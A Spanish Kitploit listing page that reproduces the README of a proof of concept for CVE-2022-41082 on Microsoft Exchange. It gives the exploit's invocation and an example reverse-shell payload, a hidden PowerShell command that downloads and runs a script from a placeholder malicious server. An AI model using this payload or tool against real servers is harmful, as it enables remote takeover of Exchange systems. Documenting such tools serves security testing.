Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-41082 — .CVE-2022-41082-poc | Kitploit
Herramientas/GitHubGitHub/soltanali0/cve-2022-41082
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

.CVE-2022-41082-poc

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-41082

Este repositorio contiene una herramienta de prueba de concepto (PoC) para explotar la vulnerabilidad OWASSRF (CVE-2022-41082) en servidores Microsoft Exchange. El exploit permite a los atacantes ejecutar comandos arbitrarios en el servidor, comprometiendo potencialmente el sistema.

Resumen

La herramienta aprovecha una vulnerabilidad OWASSRF para eludir la autenticación y obtener ejecución remota de código (RCE) en un servidor Exchange. Al explotar esta vulnerabilidad, un atacante puede ejecutar comandos como si fuera un usuario autenticado, lo que conlleva graves implicaciones de seguridad.

Cómo funciona

  1. Omisión de autenticación: La herramienta se conecta al servidor Exchange objetivo, saltándose los mecanismos de autenticación mediante solicitudes manipuladas.
  2. Ejecución remota de código: Tras iniciar sesión correctamente, la herramienta abre una sesión que permite ejecutar comandos en el servidor Exchange.
  3. Ejecución de comandos: Los usuarios pueden especificar comandos para ejecutar en el servidor, lo que permite diversas acciones, como manipulación de archivos, operaciones de red o establecimiento de shells inversas.

Nota importante

Al usar esta herramienta, asegúrese de mantener abierta la misma sesión de Exchange Management Shell. Es crucial habilitar el acceso remoto a PowerShell para al menos un usuario después de deshabilitarlo para otros. De lo contrario, podría perder el acceso a Management Shell en todos los servidores Exchange.

Comandos para administrar el acceso a PowerShell

Aquí hay algunos comandos útiles de PowerShell para comprobar y gestionar quién tiene acceso:

Verificar el acceso a PowerShell

Para ver qué usuarios tienen acceso remoto a PowerShell y cuáles no, ejecute:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

Deshabilitar el acceso a PowerShell para todos los usuarios

Advertencia: Tenga cuidado de no cerrar la ventana de Exchange Management Shell a menos que agregue al menos un usuario nuevamente.

Puede deshabilitar el acceso a PowerShell para todos los usuarios usando los siguientes comandos:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

O utilice un solo comando para lograr el mismo resultado:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Rehabilitar el acceso para un usuario específico

Para conceder acceso remoto a PowerShell a un usuario específico, ejecute:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Solución alternativa para cuando se pierde el acceso a PowerShell

Si pierde el acceso a PowerShell para todos los usuarios, puede crear un nuevo usuario de buzón con derechos de administrador. Este nuevo usuario omitirá las políticas aplicadas, lo que le permitirá volver a usar Exchange Management Shell.

Uso de la herramienta PoC

Requisitos

  • Python 3.x
  • Bibliotecas necesarias (instálelas mediante pip si es necesario)

Ejecutar la herramienta

Para ejecutar la herramienta PoC, use el siguiente comando:

root@kitploit:~
python3 poc.py -H <IP_objetivo> -u <nombre_usuario> -p <contraseña> -c <archivo_comandos>

Reemplace <IP_objetivo>, <nombre_usuario>, <contraseña> y <archivo_comandos> con sus valores específicos.

Ejemplo de comando para shell inversa

Puede modificar el comando en su cmd_file para incluir un payload de shell inversa. Por ejemplo:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Este comando descargará y ejecutará un script de PowerShell desde su servidor, proporcionándole una shell inversa.

Referencias

Para obtener más información sobre la vulnerabilidad OWASSRF y el código de la PoC, visite el siguiente enlace: OWASSRF CVE-2022-41082 PoC y https://www.youtube.com/watch?v=c2DZYP6jc7g

Descargar herramienta